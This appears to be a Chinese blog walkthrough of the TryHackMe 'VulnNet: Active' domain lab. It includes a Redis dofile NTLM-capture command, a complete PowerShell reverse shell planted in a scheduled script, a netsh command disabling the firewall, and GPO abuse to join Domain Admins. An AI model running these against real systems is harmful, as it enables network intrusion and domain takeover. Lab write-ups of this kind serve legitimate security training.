TryHackMe-VulnNet: Active(ez 域渗透)
创始人
2024-06-01 00:49:08
0

VulnNet: Active

VulnNet Entertainment在他们以前的网络中遇到了不好的时光,该网络遭受了多次破坏。现在,他们移动了整个基础架构,并再次聘请您作为核心渗透测试人员。您的目标是获得对系统的完全访问权限并破坏域。


这应该是我在thm打的最后一个中等难度的域渗透房间了,因为剩下的ad渗透都是定位:难 的房间

经验之谈:非官方的单域渗透靶机往往都有卡死、非常卡的问题,遇到不对劲直接重启靶机就完事了


端口扫描

循例 nmap

在这里插入图片描述

简单主动侦察

使用enum4linux:

enum4linux -a 10.10.134.253

这里能看到域名, 但不完整

在这里插入图片描述

再使用crackmapexec:

在这里插入图片描述

vulnnet.local

smb

smb这里也没东西

在这里插入图片描述

Redis枚举

在上面的端口扫描结果中有一个亮眼的端口就是6379,nmap显示这是redis

在这里插入图片描述

成功连上

但我目前对redis还较为薄弱,thm上有一个redis房间,过段时间再去看看

通过搜索引擎能够找到有关redis读取文件的文章:

在这里插入图片描述

NTLM 回传攻击

NTLM回传攻击在thm的域渗透教程中都是有教过的

通过这个命令能够进行文件读取,由于这里是在域内,思路就是利用这个点,然后访问攻击者开启的薄弱smb服务,然后redis这里就会去尝试进行ntlm身份验证,而攻击者也将获取该账户的ntlm hash

这个思路应该是没有问题的,来尝试一下

使用responder开启服务:

responder -I tun0

redis执行文件读取:

redis-cli -h 10.10.254.117 eval "dofile('//10.14.39.48//hack')" 0

在这里插入图片描述

使用haiti帮助我们快速找到hashcat的类型值

在这里插入图片描述

hashcat直接爆

在这里插入图片描述

SMB枚举

现在我们有了一组初始凭据,做的第一件事当然是回去smb看看有没有什么信息

在这里插入图片描述

在Enterprise-Share里发现一个powershell脚本

在这里插入图片描述

在这里插入图片描述

从这个文件名PurgeIrrelevantData和其内容,很容易能猜测到这可能是个定时脚本

我们可以尝试利用其来reverse shell,payload:

$client = New-Object System.Net.Sockets.TCPClient('10.14.39.48',8888);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

在这里插入图片描述

在这里插入图片描述

nc监听

在这里插入图片描述

getshell

本地提权

看到该账户有个SeImpersonatePrivilege

在这里插入图片描述

直接上msf

在这里插入图片描述

一键开启rdp

在这里插入图片描述

dc这里是有防火墙拦截,所以先把防火墙关了

netsh advfirewall set allprofiles state off

在这里插入图片描述

将我们的账户加入本地管理员组,同时进入rdp

在这里插入图片描述

AD枚举

查看administrator账户,我们会发现它是LA和DA

在这里插入图片描述

虽然我们现在已经彻底拿下了这个DC,但我希望能借此为数不多的域渗透靶机来练习thm所教导的知识,在这里,我将练习sharphound

先开启smbserver

在这里插入图片描述

目标连接

在这里插入图片描述

SharpHound

跑sharphound

在这里插入图片描述

通过刚刚打开的smbserver将扫描结果传回

在这里插入图片描述

BloodHound

开启neo4j

neo4j console

启动bloodhound,并将zip丢进去

在这里插入图片描述

我们利用路径搜索,从我们当前的账户到Domain Admins组有这么一条路径

在这里插入图片描述

AD利用

我们发现我们当前账户有权对security-pol这个gpo进行修改

那么我们将利用它

在rdp中打开mmc

在这里插入图片描述

在用户配置->控制面板设置 新建即时任务

在这里插入图片描述

在这里插入图片描述

将我们的账户添加到DA组

在这里插入图片描述

弄好之后使用gpupdate /force强制立即更新组策略

在这里插入图片描述

此时,我们已经是DA

在这里插入图片描述

游戏结束

上一篇:HTML 文件路径

下一篇:Python OS 模块

相关内容

热门资讯

安卓系统软件之间切换,体验流畅... 你有没有遇到过这种情况?手机里装了各种各样的安卓系统软件,有时候想切换却发现操作起来有点头疼。别急,...
一加6安卓系统下载,安卓系统下... 你有没有听说最近一加6的安卓系统下载又更新了?这可是个大新闻呢!想象你的手机就像是一辆赛车,而安卓系...
2寸安卓系统吗 你有没有听说过2寸安卓系统?是不是觉得这个名字有点奇怪,有点像是在开玩笑?别急,今天我就要带你深入了...
发光滤镜怎么调安卓系统,如何通... 亲爱的手机摄影爱好者们,你是否曾在某个夜晚,拿起手机,对着璀璨的星空,想要记录下那份神秘与美丽,却发...
环信支持安卓系统版本,全面覆盖... 你知道吗?在手机通讯领域,环信可是个响当当的名字呢!它不仅支持安卓系统,而且支持的版本跨度之大,简直...
主角是系统和安卓,未来已来 你知道吗?在这个科技飞速发展的时代,手机已经成为了我们生活中不可或缺的好伙伴。而在这众多手机品牌中,...
安卓系统哪个看电影,哪个应用是... 亲爱的手机控们,你是不是也在寻找一款既能满足你观影需求,又能在安卓系统上流畅运行的观影神器呢?别急,...
安卓系统系统画中画咋开 你有没有发现,现在手机上的功能越来越丰富,简直就像一个小型的电脑呢!今天,我就来和你聊聊安卓系统里那...
华硕装安卓系统教程视频,体验全... 亲爱的电脑小白们,你是否对华硕笔记本装上安卓系统充满好奇?想象在Windows的世界里,突然闯入了一...
安卓系统王者怎么送ios系统皮... 你有没有想过,让你的安卓系统王者英雄穿上iOS系统的皮肤呢?听起来是不是有点不可思议?别急,今天就来...
手机怎么优化安卓系统,安卓系统... 手机用久了是不是感觉越来越卡?别急,今天就来教你怎么优化安卓系统,让你的手机焕发第二春!一、清理缓存...
安卓系统的手指符号,探索手指符... 你有没有发现,在使用安卓手机的时候,那些手指符号简直就像是我们的小帮手,无处不在,却又默默无闻。今天...
安卓系统录屏位置 亲爱的手机控们,你是否曾有过这样的经历:想要记录下手机屏幕上的精彩瞬间,却发现找不到安卓系统中的录屏...
餐饮点菜系统安卓下载,餐饮点菜... 你有没有想过,点菜也能变得如此轻松有趣?没错,就是那个能让你在手机上就能轻松点菜的餐饮点菜系统!今天...
适配安卓软件的系统,安卓系统适... 你有没有想过,为什么你的安卓手机有时候运行得那么慢,有时候又那么流畅呢?这背后其实有一个非常重要的角...
安卓系统腾讯会员价格,尊享优惠 你有没有发现,最近手机上有个大变化?安卓系统里的腾讯会员价格又双叒叕调整了!这可真是让人又爱又恨啊。...
安卓微软系统哪个好,谁才是最佳... 你有没有想过,手机里装的是安卓系统还是微软系统,哪个更好呢?这个问题可真是让人纠结啊!今天,就让我带...
安卓7.0系统看内存,安卓7.... 你有没有发现,自从你的安卓手机升级到了7.0系统,它的表现好像变得不一样了呢?是不是觉得运行速度更快...
安卓系统生产厂商,探寻各大厂商... 你知道吗?在手机江湖里,安卓系统可是当之无愧的武林盟主。而在这片江湖中,有那么一群英勇的安卓系统生产...
谷歌安卓系统流畅度高 你有没有发现,最近你的安卓手机用起来是不是特别顺滑?没错,说的就是你!今天,就让我来给你揭秘为什么谷...